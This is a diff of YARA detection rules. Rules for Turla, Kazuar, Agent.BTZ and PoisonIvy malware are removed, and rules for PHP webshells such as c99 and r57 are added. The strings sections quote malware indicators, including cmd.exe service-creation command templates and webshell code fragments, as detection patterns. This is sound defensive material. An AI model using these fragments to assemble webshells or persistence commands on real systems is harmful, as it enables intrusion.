-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		family = "Turla"
-		hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
-		hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
-		hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
-		hash4 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
-		hash5 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
-		hash6 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
-		hash7 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
-		hash8 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
-		hash9 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
+		tags = ""
+		super_rule = 1
+		hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"
+		hash1 = "2601b6fc1579f263d2f3960ce775df70"
+		hash2 = "401fbae5f10283051c39e640b77e4c26"
 
 	strings:
-		$x1 = "\\\\.\\pipe\\sdlrpc" fullword ascii
-		$x2 = "WaitMutex Abandoned %p" fullword ascii
-		$x3 = "OPER|Wrong config: no port|" fullword ascii
-		$x4 = "OPER|Wrong config: no lastconnect|" fullword ascii
-		$x5 = "OPER|Wrong config: empty address|" fullword ascii
-		$x6 = "Trans task %d obj %s ACTIVE fail robj %s" fullword ascii
-		$x7 = "OPER|Wrong config: no auth|" fullword ascii
-		$x8 = "OPER|Sniffer '%s' running... ooopppsss...|" fullword ascii
-		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" fullword ascii
-		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" fullword ascii
-		$s3 = "www.yahoo.com" fullword ascii
-		$s4 = "MSXIML.DLL" fullword wide
-		$s5 = "www.bing.com" fullword ascii
-		$s6 = "%s: http://%s%s" fullword ascii
-		$s7 = "/javascript/view.php" fullword ascii
-		$s8 = "Task %d failed %s,%d" fullword ascii
-		$s9 = "Mozilla/4.0 (compatible; MSIE %d.0; " fullword ascii
+		$s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"
+		$s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 6 of ( $s* ) ) ) or ( 10 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Turla_Mal_Script_Jan18_1 : FILE
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Detects Turla malicious script"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4b550b3c-182c-5dc0-b2d2-13925c22be81"
-		date = "2018-01-19"
-		modified = "2023-12-05"
-		reference = "https://ghostbin.com/paste/jsph7"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L152-L169"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5019-L5034"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2386abf8afdf8ed9cfd55cb3dcbb998eb732744c601fd9af701cf64c366a0e62"
+		logic_hash = "a4bae5456baf0d8d894165c84d66118f2b16cfc040e299c2032eccb6a9eb4822"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "180b920e9cea712d124ff41cd1060683a14a79285d960e17f0f49b969f15bfcc"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$s1 = ".charCodeAt(i % " ascii
-		$s2 = "{WScript.Quit();}" fullword ascii
-		$s3 = ".charAt(i)) << 10) |" ascii
-		$s4 = " = WScript.Arguments;var " ascii
-		$s5 = "= \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";var i;" ascii
+		$s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft"
+		$s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"
 
 	condition:
-		filesize < 200KB and 2 of them
+		1 of them
 }
-
-rule SIGNATURE_BASE_Turla_Kazuarrat : FILE
+rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php_R57_Shell_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Detects Turla Kazuar RAT described by DrunkBinary"
-		author = "Markus Neis / Florian Roth"
-		id = "147cc7b7-6dbd-51a2-9501-bcbaec32e20e"
-		date = "2018-04-08"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/DrunkBinary/status/982969891975319553"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L173-L192"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5035-L5052"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d7f15fe8e33a9e3516eab5c3c5664aeee25d1d153f01b888a50dd2accba432ca"
+		logic_hash = "0df3e00f752f85aa1f150c01e3ef41b9a5cd3d3ce2060965992320cb3c4d87ae"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "6b5d9fca6f49a044fd94c816e258bf50b1e90305d7dab2e0480349e80ed2a0fa"
-		hash2 = "7594fab1aadc4fb08fb9dbb27c418e8bc7f08dadb2acf5533dc8560241ecfc1d"
-		hash3 = "4e5a86e33e53931afe25a8cb108f53f9c7e6c6a731b0ef4f72ce638d0ea5c198"
+		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash3 = "8023394542cddf8aee5dec6072ed02b5"
+		hash4 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash5 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$x1 = "~1.EXE" wide
-		$s2 = "dl32.dll" fullword ascii
-		$s3 = "HookProc@" ascii
-		$s4 = "0`.wtf" fullword ascii
+		$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
+		$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.imphash ( ) == "682156c4380c216ff8cb766a2f2e8817" or 2 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Turla_Agent_BTZ : FILE
+rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_Sses_Php_Php_Ctt_Sh_Php_Php
 {
 	meta:
-		description = "Detects Turla Agent.BTZ"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bd642f11-19f6-5178-b978-1215215fea86"
-		date = "2018-04-12"
-		modified = "2023-01-06"
-		reference = "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L195-L226"
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5053-L5069"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3a091d29ef5981b9ab9c0e4114fef9de70acbcbc8ea8518183a567459e1086fa"
-		score = 90
+		logic_hash = "137f98b636ec012d7d5e687f7d24ae88e8d3261360e60a4bbc03da248cce381e"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8"
+		tags = ""
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash3 = "671cad517edd254352fe7e0c7c981c39"
 
 	strings:
-		$x1 = "1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s" fullword ascii
-		$x3 = "mstotreg.dat" fullword ascii
-		$x4 = "Bisuninst.bin" fullword ascii
-		$x5 = "mfc42l00.pdb" fullword ascii
-		$x6 = "ielocal~f.tmp" fullword ascii
-		$s1 = "%s\\1.txt" fullword ascii
-		$s2 = "%windows%" fullword ascii
-		$s3 = "%s\\system32" fullword ascii
-		$s4 = "\\Help\\SYSTEM32\\" ascii
-		$s5 = "%windows%\\mfc42l00.pdb" ascii
-		$s6 = "Size of log(%dB) is too big, stop write." fullword ascii
-		$s7 = "Log: Size of log(%dB) is too big, stop write." fullword ascii
-		$s8 = "%02d.%02d.%04d Log begin:" fullword ascii
-		$s9 = "\\system32\\win.com" ascii
+		$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
+		$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
+		$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_MAL_Turla_Sample_May18_1 : FILE
+rule SIGNATURE_BASE__R577_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Detects Turla samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5052838f-a895-55cb-abcf-813465074127"
-		date = "2018-05-03"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/omri9741/status/991942007701598208"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L228-L250"
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "d287136c-534b-51a4-88fc-40ef9f22d910"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5070-L5084"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f5bb26bc787acb89fe5a337121aabc0cd15ed3fd5cbe64ef4e7031e04dc14fb1"
+		logic_hash = "09892789e8dad16f9fc7c4e22525e5d0af3af401a4b2655b70f7a6856888875c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4c49c9d601ebf16534d24d2dd1cab53fde6e03902758ef6cff86be740b720038"
-		hash2 = "77cbd7252a20f2d35db4f330b9c4b8aa7501349bc06bbcc8f40ae13d01ae7f8f"
+		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash2 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$x1 = "sc %s create %s binPath= \"cmd.exe /c start %%SystemRoot%%\\%s\">>%s" fullword ascii
-		$x2 = "cmd.exe /c start %%SystemRoot%%\\%s" fullword ascii
-		$x3 = "cmd.exe /c %s\\%s -s %s:%s:%s -c \"%s %s /wait 1\">>%s" fullword ascii
-		$x4 = "Read InjectLog[%dB]********************************" fullword ascii
-		$x5 = "%s\\System32\\011fe-3420f-ff0ea-ff0ea.tmp" fullword ascii
-		$x6 = "**************************** Begin ini %s [%d]***********************************************" fullword ascii
-		$x7 = "%s -o %s -i %s -d exec2 -f %s" fullword ascii
-		$x8 = "Logon to %s failed: code %d(User:%s,Pass:%s)" fullword ascii
-		$x9 = "system32\\dxsnd32x.exe" fullword ascii
+		$s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"
+		$s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr20_1 : FILE
+rule SIGNATURE_BASE_Webshell_C99_Generic
 {
 	meta:
-		description = "Detects Turla Linux malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f21e7793-a7dd-5195-805d-963827b35808"
-		date = "2020-04-05"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/Int2e_/status/1246115636331319309"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L252-L272"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5085-L5105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d463f5a151bb0c3440d719b4c7c0d1ca34de1e0bed7fb9167ecf396607abd3ff"
+		logic_hash = "422bc3a0d9b04b1e37ad954faacb1ec7841fe529c1eb19634bdbfe83da374c73"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
-		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "09609851caa129e40b0d56e90dfc476c"
+		hash6 = "671cad517edd254352fe7e0c7c981c39"
 
 	strings:
-		$s1 = "/root/.hsperfdata" ascii fullword
-		$s2 = "Desc|     Filename     |  size  |state|" ascii fullword
-		$s3 = "IPv6 address %s not supported" ascii fullword
-		$s4 = "File already exist on remote filesystem !" ascii fullword
-		$s5 = "/tmp/.sync.pid" ascii fullword
-		$s6 = "'gateway' supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel" ascii fullword
+		$s0 = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\""
+		$s1 = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile"
+		$s2 = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr"
+		$s3 = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m"
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 5000KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Tinyturla_Sep21_1 : FILE
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Detects Tiny Turla backdoor DLL"
-		author = "Cisco Talos"
-		id = "19659ac7-310a-52dd-a94c-022c7add752b"
-		date = "2021-09-21"
-		modified = "2023-12-05"
-		reference = "https://blog.talosintelligence.com/2021/09/tinyturla.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L275-L295"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5106-L5123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ede598374bc4a8a870aa29498be4200b4a3d7b289dfcb680fb3f91108d212bca"
+		logic_hash = "b133cf947476a1c94ed90b5cd3757ca8aa429be4284d75664625896d9cfa687f"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "030cbd1a51f8583ccfc3fa38a28a5550dc1c84c05d6c0f5eb887d13dedf1da01"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$a = "Title: " fullword wide
-		$b = "Hosts" fullword wide
-		$c = "Security" fullword wide
-		$d = "TimeLong" fullword wide
-		$e = "TimeShort" fullword wide
-		$f = "MachineGuid" fullword wide
-		$g = "POST" fullword wide
-		$h = "WinHttpSetOption" fullword ascii
-		$i = "WinHttpQueryDataAvailable" fullword ascii
+		$s0 = "$sess_data[\"cut\"] = array(); c99_s"
+		$s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Poisonivy_Generic_3 : FILE
+rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "PoisonIvy RAT Generic Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0f6a47ee-b741-59cc-b2d6-6bf3989ce8e7"
-		date = "2015-05-14"
-		modified = "2023-12-05"
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "c01ad0e5-1aff-5128-9d0c-5d0967532a4b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poisonivy_gen3.yar#L2-L32"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5124-L5138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e1cbdf740785f97c93a0a7a01ef2614be792afcd"
-		logic_hash = "8116b07c00218a0e9784447f322455ff24ae754770b85db760b1c397e10e5695"
+		logic_hash = "7bdaebfb093b58a2fd33b4bbeea8465d0f724383b4855eb521a3e339ee153781"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$k1 = "Tiger324{" fullword ascii
-		$s2 = "WININET.dll" fullword ascii
-		$s3 = "mscoree.dll" fullword wide
-		$s4 = "WS2_32.dll" fullword
-		$s5 = "Explorer.exe" fullword wide
-		$s6 = "USER32.DLL"
-		$s7 = "CONOUT$"
-		$s8 = "login.asp"
-		$h1 = "HTTP/1.0"
-		$h2 = "POST"
-		$h3 = "login.asp"
-		$h4 = "check.asp"
-		$h5 = "result.asp"
-		$h6 = "upload.asp"
+		$s0 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+		$s2 = "c99sh_sqlquery"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( $k1 or all of ( $s* ) or all of ( $h* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Turla_Png_Dropper : FILE
+rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Sses_Php_Php_Specialshell_99_Php_Php
 {
 	meta:
-		description = "Detects the PNG Dropper used by the Turla group"
-		author = "Ben Humphrey"
-		id = "459f17c8-0eae-5736-8c7c-286625dc158f"
-		date = "2018-11-23"
-		modified = "2023-12-05"
-		reference = "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_png_dropper_nov18.yar#L3-L49"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ee1fd555-f1bc-59a5-998c-f6098de8623e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5139-L5155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c859310660603d0748cf17daea0799af7684f2a9f77f729871eb57338fbfcca6"
+		logic_hash = "6dbd40e19d4d5753dbd1f7e627bccc08a60430de8138a923f13e836d19dde65c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "6ed939f59476fd31dc4d99e96136e928fbd88aec0d9c59846092c0e93a3c0e27"
+		tags = ""
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
 
 	strings:
-		$api0 = "GdiplusStartup"
-		$api1 = "GdipAlloc"
-		$api2 = "GdipCreateBitmapFromStreamICM"
-		$api3 = "GdipBitmapLockBits"
-		$api4 = "GdipGetImageWidth"
-		$api5 = "GdipGetImageHeight"
-		$api6 = "GdiplusShutdown"
-		$code32 = {
-            8B 46 3C               // mov     eax, [esi+3Ch]
-            B9 0B 01 00 00         // mov     ecx, 10Bh
-            66 39 4C 30 18         // cmp     [eax+esi+18h], cx
-            8B 44 30 28            // mov     eax, [eax+esi+28h]
-            6A 00                  // push    0
-            B9 AF BE AD DE         // mov     ecx, 0DEADBEAFh
-            51                     // push    ecx
-            51                     // push    ecx
-            03 C6                  // add     eax, esi
-            56                     // push    esi
-            FF D0                  // call eax
-        }
-		$code64 = {
-            48 63 43 3C            // movsxd rax, dword ptr [rbx+3Ch]
-            B9 0B 01 00 00         // mov ecx, 10Bh
-            BA AF BE AD DE         // mov edx, 0DEADBEAFh
-            66 39 4C 18 18         // cmp [rax+rbx+18h], cx
-            8B 44 18 28            // mov eax, [rax+rbx+28h]
-            45 33 C9               // xor r9d, r9d
-            44 8B C2               // mov r8d, edx
-            48 8B CB               // mov rcx, rbx
-            48 03 C3               // add rax, rbx
-            FF D0                  // call rax
-        }
+		$s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"
+		$s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of ( $api* ) and 1 of ( $code* )
+		1 of them
 }
-
-rule SIGNATURE_BASE_Turla_Png_Reg_Enum_Payload : FILE
+rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php_Spy_Php_Php_S_Php_Php
 {
 	meta:
-		description = "Payload that has most recently been dropped by the Turla PNG Dropper"
-		author = "Ben Humphrey"
-		id = "413bb315-3c01-56ab-92db-00342a11438a"
-		date = "2018-11-23"
-		modified = "2023-12-05"
-		reference = "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_png_dropper_nov18.yar#L51-L77"
+		description = "Semi-Auto-generated "
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "44b53124-c8b6-545b-819f-77fd65e5d61b"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5156-L5172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b01d0c3a26ce955570ed5607514906bd8860f36637957e39a15f74a7dbb1a1e6"
+		logic_hash = "834c33059e08e8075a8d3f69187b74f3b53afabfc37ae1f13a2f579f0948a363"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "fea27eb2e939e930c8617dcf64366d1649988f30555f6ee9cd09fe54e4bc22b3"
+		tags = ""
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash4 = "817671e1bdc85e04cc3440bbd9288800"
 
 	strings:
-		$crypt00 = "Microsoft Software Key Storage Provider" wide
-		$crypt01 = "ChainingModeCBC" wide
+		$s0 = "echo sr(15,\"<b>\".$lang[$language.'_text"
+		$s1 = ".$arrow.\"</b>\",in('text','"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and pe.imports ( "advapi32.dll" , "StartServiceCtrlDispatcherA" ) and pe.imports ( "advapi32.dll" , "RegEnumValueA" ) and pe.imports ( "advapi32.dll" , "RegEnumKeyExA" ) and pe.imports ( "ncrypt.dll" , "NCryptOpenStorageProvider" ) and pe.imports ( "ncrypt.dll" , "NCryptEnumKeys" ) and pe.imports ( "ncrypt.dll" , "NCryptOpenKey" ) and pe.imports ( "ncrypt.dll" , "NCryptDecrypt" ) and pe.imports ( "ncrypt.dll" , "BCryptGenerateSymmetricKey" ) and pe.imports ( "ncrypt.dll" , "BCryptGetProperty" ) and pe.imports ( "ncrypt.dll" , "BCryptDecrypt" ) and pe.imports ( "ncrypt.dll" , "BCryptEncrypt" ) and all of them
+		2 of them
 }
-
-rule SIGNATURE_BASE_VULN_Printerdriver_Privesc_CVE_2021_3438_Jul21 : FILE
+rule SIGNATURE_BASE__R577_Php_Php_Sniper_SA_Shell_Php_R57_Php_Php
 {
 	meta:
-		description = "Detects affected drivers with PE timestamps older than the date of the initial report"
